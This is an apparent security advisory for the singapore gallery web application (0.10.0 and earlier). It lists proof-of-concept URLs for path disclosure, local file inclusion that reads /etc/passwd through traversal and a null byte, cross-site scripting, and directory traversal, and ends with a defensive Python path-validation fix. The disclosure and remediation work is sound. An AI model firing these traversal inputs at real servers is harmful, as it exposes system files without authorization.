Product : singapore gallery
Versions : 0.10.0 and prior
Site : http://www.sgal.org/
Discovered By : Moroccan Security Research Team (Simo64)
Greetz : CiM-Team - dabdoub - DarkbiteX - drackanz - Iss4m - Mourad - Rachid .:r00tkita - s4mi - Silitix - tahati - And All Friends :)

[-] Vulnerable code near lines 16-35 :

    config->base_path.$sg->config->pathto_current_template."index.tpl.php"; ?>

[+] Full Path Disclosure :
**************************
Example:
http://localhost/singapore/index.php?template=simo64

Result :
Warning: main(templates/simo64/index.tpl.php): failed to open stream: No such file or directory in /home/sing/public_html/livedemo/index.php on line 35

[+] Local File Inclusion :
***************************
Proof Of Concept :
http://localhost/singapore/index.php?template=./../../../../etc/passwd%00

[+] Cross Site Scripting :
**************************
http://localhost/singapore/index.php?template=

[+] Directory Traversal :
**************************
Proof Of Concept :
http://localhost/singapore/index.php?gallery=./../../../
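The root cause above is a user-controlled template name concatenated into an include path, so traversal sequences and a %00 terminator reach the filesystem. As an added defensive example (not code from singapore gallery), the Python function below shows the fix pattern: allowlist the name, resolve the path, and confirm it stays inside the templates directory. The templates/<name>/index.tpl.php layout is assumed from the warning message in the advisory; the demo directory is constructed.

```python
import os
import re
import tempfile

# A template identifier is a plain directory name: no separators, dots or NULs.
TEMPLATE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def resolve_template(templates_dir: str, name: str):
    """Map a user-supplied template name to templates_dir/<name>/index.tpl.php.

    Returns the absolute file path for a valid, existing template, or None for
    anything else (traversal, embedded null byte, unknown template). The
    index.tpl.php layout is assumed from the advisory's warning output.
    """
    # Reject NUL before touching the filesystem: os.path calls raise on it,
    # and the original PHP include truncated the path at that byte.
    if "\x00" in name or not TEMPLATE_NAME.fullmatch(name):
        return None
    base = os.path.realpath(templates_dir)
    candidate = os.path.realpath(os.path.join(base, name, "index.tpl.php"))
    # Containment check after symlink resolution: must still be under base.
    if os.path.commonpath([base, candidate]) != base:
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def build_demo_templates() -> str:
    """Create a constructed templates directory holding one real template."""
    root = tempfile.mkdtemp(prefix="sgal_templates_")
    os.makedirs(os.path.join(root, "default"))
    with open(os.path.join(root, "default", "index.tpl.php"), "w") as fh:
        fh.write("<?php /* constructed placeholder template */ ?>\n")
    return root


if __name__ == "__main__":
    root = build_demo_templates()
    # The last three values mirror the advisory's PoC inputs after URL decoding.
    for value in ["default", "simo64", "./../../../../etc/passwd\x00", "../default"]:
        print(repr(value), "->", resolve_template(root, value))
```

Only "default" resolves; the unknown name, the traversal-plus-NUL string and the relative escape all return None, so the include never runs on attacker-chosen paths.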